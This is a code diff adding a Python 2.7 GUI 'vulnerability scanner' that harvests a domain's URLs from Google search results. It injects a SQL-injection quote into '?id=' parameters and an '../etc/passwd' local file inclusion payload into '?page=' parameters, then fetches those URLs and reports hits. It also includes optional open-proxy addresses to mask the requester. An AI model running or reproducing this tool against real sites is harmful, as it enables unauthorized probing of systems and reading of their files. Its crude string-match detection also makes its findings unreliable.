|
| 1 | +# Python 2.7 |
| 2 | +# input type : url |
| 3 | +######################## |
| 4 | +# Coded By # |
| 5 | +# Aarav Shah # |
| 6 | +######################## |
| 7 | + |
| 8 | + |
| 9 | + |
| 10 | +from Tkinter import * |
| 11 | +import requests |
| 12 | +from bs4 import BeautifulSoup |
| 13 | +import re |
| 14 | +import urllib |
| 15 | +import ttk |
| 16 | + |
| 17 | +def callback(): |
| 18 | + query=e.get() |
| 19 | + num = value1.get() |
| 20 | + print num |
| 21 | + i=0 |
| 22 | + f = open(query+'.txt', 'w') #open file |
| 23 | + http_proxy = "http://97.84.14.116:8080/" |
| 24 | + https_proxy = "http://12.33.254.195:3128/" |
| 25 | + |
| 26 | + proxyDict = { |
| 27 | + "http" : http_proxy, |
| 28 | + "https" : https_proxy |
| 29 | + } |
| 30 | + while(i<num): #num= combobox drop down value |
| 31 | + page = requests.get("http://www.google.com/search?q=site:"+query+"&start="+str(i)) #,proxies=proxyDict) #Remove the Comment in proxies to use a proxy server |
| 32 | + soup = BeautifulSoup(page.content, 'html.parser') |
| 33 | + i=i+10 |
| 34 | + j=0 |
| 35 | + for link in soup.find_all("a",href=re.compile("(?<=/url\?q=)(htt.*://.*)")): |
| 36 | + g= str((re.split(":(?=http)",link["href"].replace("/url?q=","")))) |
| 37 | + h= urllib.unquote(g) |
| 38 | + s= h.replace ("[u'", "") |
| 39 | + l= s.replace ("', u'","\n") |
| 40 | + k = l.replace ("https" , "http") |
| 41 | + p= k.replace ("']","") |
| 42 | + head, sep, tail = p.partition('&') |
| 43 | + if 'webcache' not in head and 'site:' not in head: |
| 44 | + if '?id=' in head: |
| 45 | + f.write(head+ "'"+ "\n") |
| 46 | + if '?page' in head: |
| 47 | + head, sep, tail = p.partition('=') |
| 48 | + f.write(head+ "=../../../../../../../../../../../../../../etc/passwd" + "\n") |
| 49 | + f.close() |
| 50 | + |
| 51 | + |
| 52 | + |
| 53 | +#bad_words = ['webcache', 'site:'] |
| 54 | + |
| 55 | +#with open(query+'.txt') as oldfile, open('newfile.txt', 'w') as newfile: |
| 56 | + # for line in oldfile: |
| 57 | + # if not any(bad_word in line for bad_word in bad_words): |
| 58 | + # newfile.write(line) |
| 59 | + |
| 60 | + |
| 61 | + f2 = open(query+'.txt', 'r+') |
| 62 | + links = f2.readlines() |
| 63 | + words = ['sql' , 'MySQL' , 'SQL'] |
| 64 | + words2 = ['root' ,'/etc/','/home/'] |
| 65 | + for link in links: |
| 66 | + if '?id=' in link: |
| 67 | + flag=0 |
| 68 | + site = urllib.urlopen(link).read() |
| 69 | + for word in words: |
| 70 | + flag=0 |
| 71 | + if word in site: |
| 72 | + flag=1 |
| 73 | + if flag==1: |
| 74 | + str1= str("[SQLI] Vulnerability found at " + link) |
| 75 | + listbox.insert(END, str1) |
| 76 | + if '?page=' in link: |
| 77 | + site = urllib.urlopen(link).read() |
| 78 | + for word2 in words2: |
| 79 | + flag=0 |
| 80 | + if word2 in site: |
| 81 | + flag=1 |
| 82 | + if flag==1: |
| 83 | + str2= str("[LFI] Vulnerability found at " + link) |
| 84 | + listbox.insert(END, str2) |
| 85 | + |
| 86 | + |
| 87 | + #f2.seek(0) |
| 88 | + #for i in d: |
| 89 | + # if i != "http://webcache.googleusercontent.com/": |
| 90 | + # f2.write(i) |
| 91 | + #f2.truncate() |
| 92 | + f2.close() |
| 93 | + |
| 94 | +master = Tk() |
| 95 | +master.title('VULNERABILITY SCANNER') |
| 96 | +e = Entry(master) |
| 97 | +e.pack(fill=X) |
| 98 | +e.pack() |
| 99 | +w = Label(master, text=":.: Website Vulnerability Scanner Tool :.:",fg="blue",font=("Helvetica -14 bold")) |
| 100 | +w.pack() |
| 101 | +e.focus_set() |
| 102 | +b = Button(master, text=">>>", width=10, command=callback, bg="black", fg="green") |
| 103 | +b.pack() |
| 104 | +listbox = Listbox(master, bg="black",fg="green",width =80) |
| 105 | +listbox.pack() |
| 106 | +value1=IntVar() |
| 107 | +#master.option_add("*TCombobox*Listbox*Background", 'green') |
| 108 | +drop = ttk.Combobox(master,textvariable=value1,width=5, state='readonly') |
| 109 | +drop['values']=('10','20','30','40','50','60','70','80','90','100') |
| 110 | +drop.current(0) |
| 111 | +drop.place(x=433,y=0) |
| 112 | + |
| 113 | + |
| 114 | +mainloop() |
| 115 | + |
| 116 | + |
| 117 | + |
| 118 | + |
0 commit comments